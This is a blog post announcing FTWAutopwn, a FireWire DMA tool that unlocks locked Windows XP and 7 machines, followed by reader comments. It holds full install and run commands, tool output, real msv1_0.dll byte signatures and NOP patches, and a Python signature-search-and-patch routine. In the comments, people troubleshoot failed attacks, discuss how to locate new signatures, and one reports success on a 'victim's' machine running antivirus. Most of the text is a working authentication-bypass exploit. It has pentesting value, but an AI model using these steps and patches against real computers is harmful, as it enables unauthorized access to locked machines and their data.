Update: FTWAutopwn is now named Inception. I've created a standalone page for the tool here; please refer to that page for updates on the tool.
For the last few days I've been working on an alternative to winlockpwn (which unlocks locked Windows machines through FireWire SBP-2 DMA), built on libforensic1394. I've now released an alpha version of the tool, Fire Through the Wire Autopwn (FTWAutopwn), on GitHub. Here's how to use it:
Check that your distro uses the new IEEE1394 stack
$ ls /dev | grep fw
If the new stack is loaded and the system has at least one FireWire port, `fw0` should be printed. Additional ports/devices take the form `fw<n>`. If nothing is listed, the new stack is most likely not loaded. That sucks; on Debian/Ubuntu, unload the old stack and load the new one, then re-run the `ls` check above:
$ sudo modprobe -r ohci1394 sbp2 eth1394 dv1394 raw1394 video1394
$ sudo modprobe firewire-ohci
Download and install libforensic1394
$ sudo apt-get install git cmake python3
$ wget https://freddie.witherden.org/tools/libforensic1394/releases/libforensic1394-0.2.tar.gz
$ tar xvf libforensic1394-0.2.tar.gz
$ cd libforensic1394-0.2
$ mkdir build
$ cd build
$ cmake -G"Unix Makefiles" ../
$ make
$ sudo make install
$ cd ../python
$ sudo python3 setup.py install
Note that `make install` puts `libforensic1394.so.1` under /usr/local/lib. If the Python bindings later fail with "libforensic1394.so.1: cannot open shared object file", the dynamic loader cannot see that directory: run `sudo ldconfig`, or export `LD_LIBRARY_PATH=/usr/local/lib` before starting the tool.
Download and use FTWAutopwn
$ cd
$ git clone https://github.com/carmaa/FTWAutopwn.git
$ cd FTWAutopwn
$ python3 ftwautopwn.py
The last command should now work. Connect your attacking machine to a locked Windows 7 or XP machine with a FireWire (IEEE 1394) cable, run the command above, select the correct target, and you're off!
$ python3 ftwautopwn.py
Fire Through the Wire Autopwn v.0.0.1
by Carsten Maartmann-Moe <[email protected]> 2011
For updates, check out https://github.com/carmaa/FTWAutopwn
[+] Available targets:
[1] Win7 32-bit msv1_0.dll technique
[2] Win7 64-bit msv1_0.dll technique
[3] WinXP SP2 msv1_0.dll technique
[4] WinXP SP3 msv1_0.dll technique
Please select target: 4
[+] You have selected: WinXP SP3 msv1_0.dll technique
Using signature: 83f8107511b0018b
Using patch: 83f8109090b0018b
Using offset: 2146
[+] Searching for signature, 12 MiB so far.
[+] Signature found at 0xd7d862.
[+] Write-back verified; patching successful. Bon voyage!
You should now be able to log onto your target machine with any password.
Full syntax is provided by the -h/--help switch:
$ python3 ftwautopwn.py -h
Fire Through the Wire Autopwn v.0.0.1
by Carsten Maartmann-Moe <[email protected]> 2011
For updates, check out https://github.com/carmaa/FTWAutopwn
Usage: ftwautopwn [OPTIONS]
-d, --delay=TIME: Delay attack by TIME seconds. This is useful in order to guarantee that the target machine has successfully installed the SBP2 device before attacking. If the attack fails, try to increase this value.
-f, --file=FILE: Use a file instead of FireWire bus data as input; for example to facilitate attacks on VMware machines or to ease testing and signature generation efforts
-h, --help: Displays this message
-l, --list: Lists available target operating systems
-n, --no-write: Dry run, do not write back to memory
-t TARGET, --target=TARGET: Specify target operating system (use --list to list available targets)
-v, --verbose: Verbose mode
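To make the three numbers the tool prints (signature, patch, offset) concrete, here is an added example that is not FTWAutopwn's own code: a small signature search-and-patch routine of the kind the -f/--file mode runs over a memory image. The XP SP3 signature and patch are the ones printed above (cmp eax,10h / jnz short / mov al,1, with the two-byte jnz replaced by two NOPs). Everything else is assumed for illustration: the `ImageMemory` backend with `read()`/`write()` stands in for the FireWire bus, a `None` in a signature means "any byte", and the `near_jnz_wildcard` target is a constructed illustration of wildcarding the rel32 of a six-byte near jnz, not a real Windows signature. The image it scans is constructed inline.

```python
"""Signature search and patch over a memory image, in the spirit of FTWAutopwn's
-f/--file mode.  Added example, not the tool's own code.

Assumed (not from the post): a memory backend with read()/write() stands in for
the FireWire bus, None in a signature is a wildcard byte, and the "near jnz"
target is a constructed illustration, not a real Windows signature.
"""
import re

CHUNK = 4096  # scan granularity, mirroring the chunked reads a DMA scanner does


class ImageMemory:
    """Memory backend over a bytearray (a dumped image); stands in for FireWire DMA."""

    def __init__(self, image):
        self.image = bytearray(image)

    def size(self):
        return len(self.image)

    def read(self, addr, n):
        return bytes(self.image[addr:addr + n])

    def write(self, addr, data):
        self.image[addr:addr + len(data)] = data


class ReadOnlyMemory(ImageMemory):
    """Backend whose writes never land (no DMA write access); shows what a
    failed write-back verification looks like."""

    def write(self, addr, data):
        pass


# Each target is a list of bytes; None = wildcard (matches anything, left as-is).
TARGETS = {
    # Signature/patch the tool prints for XP SP3 in the post:
    # cmp eax,10h ; jnz short +0x11 ; mov al,1 ; ...  -> jnz short becomes two NOPs
    "xp_sp3_msv1_0": {
        "signature": [0x83, 0xF8, 0x10, 0x75, 0x11, 0xB0, 0x01, 0x8B],
        "patch":     [0x83, 0xF8, 0x10, 0x90, 0x90, 0xB0, 0x01, 0x8B],
    },
    # Constructed: cmp eax,10h ; jnz near rel32 (0F 85 xx xx xx xx).  The rel32 is
    # wildcarded because it changes whenever code between the jump and its target
    # moves; the whole six-byte jump is NOPed out.
    "near_jnz_wildcard": {
        "signature": [0x83, 0xF8, 0x10, 0x0F, 0x85, None, None, None, None],
        "patch":     [0x83, 0xF8, 0x10, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90],
    },
}


def compile_signature(sig):
    """Turn a byte/None list into a bytes regex; '.' with DOTALL matches any byte."""
    parts = [b"." if b is None else re.escape(bytes([b])) for b in sig]
    return re.compile(b"".join(parts), re.DOTALL)


def find_signature(mem, sig, start=0):
    """Scan memory in CHUNK-sized reads, overlapping by len(sig)-1 bytes so a
    match straddling a chunk boundary is not missed.  Returns address or None."""
    pat = compile_signature(sig)
    addr = start
    while addr < mem.size():
        m = pat.search(mem.read(addr, CHUNK + len(sig) - 1))
        if m:
            return addr + m.start()
        addr += CHUNK
    return None


def patch_at(mem, addr, patch):
    """Write the patch (None = keep the byte already there), then read it back
    to verify, which is what 'Write-back verified' in the tool's output means."""
    current = mem.read(addr, len(patch))
    wanted = bytes(cur if p is None else p for cur, p in zip(current, patch))
    mem.write(addr, wanted)
    return mem.read(addr, len(wanted)) == wanted


def unlock(mem, target, dry_run=False):
    """Find the target's signature and patch it; dry_run mirrors -n/--no-write."""
    t = TARGETS[target]
    addr = find_signature(mem, t["signature"])
    if addr is None or dry_run:
        return {"found": addr, "patched": False}
    return {"found": addr, "patched": patch_at(mem, addr, t["patch"])}


# Constructed 64 KiB image: deterministic filler containing none of the
# signatures, plus three planted sequences.
XP_SIG = bytes(TARGETS["xp_sp3_msv1_0"]["signature"])
SHORT_SIG = list(XP_SIG[3:])          # jnz/mov tail only, without cmp eax,10h
NEAR_SEQ = bytes([0x83, 0xF8, 0x10, 0x0F, 0x85, 0x50, 0x94, 0x00, 0x00])
DECOY_ADDR = 0x400                    # the tail bytes inside unrelated code
REAL_ADDR = 2 * CHUNK - 3             # deliberately straddles a chunk boundary
NEAR_ADDR = 0x5000


def build_image():
    img = bytearray(bytes(range(256)) * 256)
    img[DECOY_ADDR:DECOY_ADDR + len(SHORT_SIG)] = bytes(SHORT_SIG)
    img[REAL_ADDR:REAL_ADDR + len(XP_SIG)] = XP_SIG
    img[NEAR_ADDR:NEAR_ADDR + len(NEAR_SEQ)] = NEAR_SEQ
    return img


if __name__ == "__main__":
    mem = ImageMemory(build_image())
    print("tail-only signature hits the decoy at 0x%x" % find_signature(mem, SHORT_SIG))
    print("xp target:", unlock(mem, "xp_sp3_msv1_0"))
    print("near jnz target:", unlock(mem, "near_jnz_wildcard"))
    print("read-only bus:", unlock(ReadOnlyMemory(build_image()), "xp_sp3_msv1_0"))
```

Two things worth noticing when running it: the tail-only signature (without the preceding cmp eax,10h) matches the planted decoy first, which is why a longer signature that includes the previous instruction is safer against false positives; and with the read-only backend the search succeeds but the read-back differs, which is the "Write-back could not be verified" situation rather than "Signature not found".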
Koko
Hi. Good job, but it seems that it has a dependency problem…
python3 ftwautopwn.py -h
Traceback (most recent call last):
File "ftwautopwn.py", line 7, in <module>
from ftwautopwn import unlock
File "/home/bap-hmc/FTWAutopwn/ftwautopwn/unlock.py", line 7, in <module>
from forensic1394 import Bus
File "/usr/local/lib/python3.2/dist-packages/forensic1394/__init__.py", line 1, in <module>
from .bus import Bus
File "/usr/local/lib/python3.2/dist-packages/forensic1394/bus.py", line 25, in <module>
from forensic1394.functions import forensic1394_alloc, forensic1394_destroy, \
File "/usr/local/lib/python3.2/dist-packages/forensic1394/functions.py", line 35, in <module>
lib = cdll.LoadLibrary(loc)
File "/usr/lib/python3.2/ctypes/__init__.py", line 418, in LoadLibrary
return self._dlltype(name)
File "/usr/lib/python3.2/ctypes/__init__.py", line 340, in __init__
self._handle = _dlopen(self._name, mode)
OSError: libforensic1394.so.1: cannot open shared object file: No such file or directory
Did you already have this problem? Any solution?
Thanks and regards.
Koko
Carsten
Let me guess: You’re using BackTrack? I ran into the same problem, it is not a dependency issue though. The trick is to set LD_LIBRARY_PATH to /usr/local/lib, where the libforensic1394 modules are:
export LD_LIBRARY_PATH=/usr/local/lib
Let me know if this doesn't work.
koko
Hi,
No, I'm using the latest Ubuntu version (11.04).
I solved the problem by copying the libforensic1394 library files (libforensic1394.a, libforensic1394.so.0.2.0, libforensic1394.so and libforensic1394.so.1) into /usr/lib/.
Then, it works perfectly !
Regards,
Koko
Mike
Very cool. It worked against an XP SP3 machine, but it didn't work against a W7 SP1. Does the signature have to be updated for W7 SP1?
Carsten
What version of Win7 are you using (open a command shell and execute winver to check, and paste the whole 'Version' string here)? I'll update the signatures/offsets if they've changed.
mike
Hi Carsten,
I noticed that you updated the signature. I'll give it a try. I also took a look at the link listed below. Very informative. But I noticed the offset in your code is quite different. Any chance to share how you go about finding signatures, etc.?
Carsten
Actually, the signatures are almost the same; the only difference is that I've chosen to include the previous ASM instruction (cmp eax, 10h) in my signature (0x0F8550940000 in the article vs. 0x83F8100F85509400 in FTWAutopwn). When unlocking the screen through Metasploit it is also important to realize that Metasploit sees virtual address space, as opposed to the physical address space seen by FTWAutopwn. That's why Metasploit looks for the entry point of MsvpPasswordValidate first (the 'sig' variable in the array in the screen_unlock.rb script) before looking for the actual signature (the 'orig_code' variable).
The method for finding signatures is really similar to the method described in the article; it requires a bit of disassembly but nothing too advanced. I'll try to do a write-up on it sometime in the future; right now I'm trying to implement autodetection of OS and service pack level.
mike
Thanks, Carsten. Looking forward to it. I tried the new signature against a W7 Enterprise 64-bit, Version 6.1 (build 7601: Service Pack 1). A couple of things I don't quite get:
1) Initially the machine had 8G memory in it; with the -v option, almost all the reads return 0.
2) After I took out 4G memory, it seemed that I'm getting non-zeros, but it still failed to find the signature.
My guess is that this is yet another version of the msv1_0.dll? Unfortunately I haven't got an IDA Pro that can do 64-bit DLLs yet, but this is something I'd seriously like to learn. Looking forward to your write-up.
Carsten
Hmm. Looks like the signature's much less stable on x64. The offset of the signature, as well as the address of the jnz jump that we're NOPing out, change frequently as Microsoft makes changes to the code.
The main problem is that the jump address is > 46kB away from the jump code, so any change in the code in between will change the jump address. I'll have to implement some kind of fuzzy matching in order to counter this. AFAIK the Win 7 32-bit signatures are stable for now, so for demo purposes I suggest attacking x32 architectures at the moment.
Carsten
Hi again Mike, just noticed that these blogs:
http://www.lestutosdenico.com/pentest/patch-ftwautopwn/
https://www.moonloop.org/bin/view/Moonloop/Article:k9iBW83eo9cBsdUlg7Red6cUaILIXVGw
have quite good write-ups on how to locate signatures while I'm working on my own tutorial…
Michael Wu
Thanks, Carsten. I appreciate that. I watched your presentation at password^11 too. I then came to realize that you were also the author of Interrogate, which I also used. Very cool stuff. Keep up the good work.
helper
http://astr0baby.wordpress.com/2011/09/20/unlocking-windows-7-sp1-locked-screen-remotely/
Mike
Very informative. I followed through using an XP SP3 version of the DLL. Looks like I've got it. But I don't get the purpose of this particular Metasploit script: if I've already got a session on the box, what's the point of unlocking the screen?
Alex Cheng
Finally got my cable. Tested it but it threw me this error:
root@bt:/pentest/firewire/FTWAutopwn# python3.1 ftwautopwn.py
Fire Through the Wire Autopwn v.0.0.2
by Carsten Maartmann-Moe 2011
For updates, check out https://github.com/carmaa/FTWAutopwn
[+] Available targets:
[1] Windows 7 SP1 (x86) msv1_0.dll MsvpPasswordValidate technique
[2] Windows 7 SP1 (x64) msv1_0.dll MsvpPasswordValidate technique
[3] Windows 7 (x86) msv1_0.dll MsvpPasswordValidate technique
[4] Windows 7 (x64) msv1_0.dll MsvpPasswordValidate technique
[5] Windows Vista (x86) msv1_0.dll MsvpPasswordValidate technique
[6] Windows XP SP3 (x86) msv1_0.dll MsvpPasswordValidate technique
[7] Windows XP SP2 (x86) msv1_0.dll MsvpPasswordValidate technique
[8] Apple OS X 10.6.4 and lower (Intel x64) DoShadowHashAuth technique
[9] Ubuntu 9.04 (x86) Gnome lockscreen unlock
Please select target (or enter ‘q’ to quit): 6
[+] You have selected: Windows XP SP3 (x86) msv1_0.dll MsvpPasswordValidate technique
Phase 1:
Using signature: 0x83f8107511b0018b
Using patch: 0x83f8109090b0018b
Using offset: 0x8aa (2218)
Phase 2:
Using signature: 0x83f8107511b0018b
Using patch: 0x83f8109090b0018b
Using offset: 0x862 (2146)
[+] Initializing bus and enabling SBP2, please wait 1 seconds or press Ctrl+C
Traceback (most recent call last):
File "ftwautopwn.py", line 78, in <module>
main(sys.argv[1:])
File "ftwautopwn.py", line 74, in main
unlock.run(ctx)
File "/pentest/firewire/FTWAutopwn/ftwautopwn/unlock.py", line 128, in run
d = initialize_fw(d)
File "/pentest/firewire/FTWAutopwn/ftwautopwn/unlock.py", line 253, in initialize_fw
d = b.devices()[0]
IndexError: list index out of range
Any idea? The winver of the tested machine is:
Version 5.1 (Build 2600.xpsp_sp3_gdr.111025-1629 : Service Pack 3)
Would love to try on the Vista but that machine does not have firewire… =(
Alex Cheng
Also, something weird happened. I logged in on my victim's XP SP3 machine (meaning Windows was not in lock-screen mode) and re-ran FTWAutopwn. It managed to run (surprisingly), but the following happened:
[+] Initializing bus and enabling SBP2, please wait 1 seconds or press Ctrl+C
[*] Detecting memory size…
4096 MiB main memory detected
–snip–
[+] Searching for signature, 4096 MiB so far.
[+] Phase 2:
[+] Searching for signature, 131 MiB so far.
[-] Looks like we’re not getting any data. We could be outside memory
boundaries, or simply not have DMA. Try using -v/–verbose to debug.
Continue? [Y/n]: y
[+] Searching for signature, 146 MiB so far.
[-] Looks like we’re not getting any data. We could be outside memory
boundaries, or simply not have DMA. Try using -v/–verbose to debug.
Continue? [Y/n]: y
[+] Searching for signature, 238 MiB so far.
[+] Signature found at 0xee0f862.
[-] Write-back could not be verified; patching unsuccessful.
[!] Signature not found.
[!] Attack unsuccessful.
Sorry for spamming.
Carsten
Sorry for the late reply. Try the experimental version instead, and post again here if you run into trouble. That’s the ftwa.py command.
Alex Cheng
Carsten, it works beautifully now! Thanks! =D (I have McAfee running on the laptop I'm attempting to connect to, and it works.)
Alex Cheng
Oops I mean Carsten =P Sorry for the typo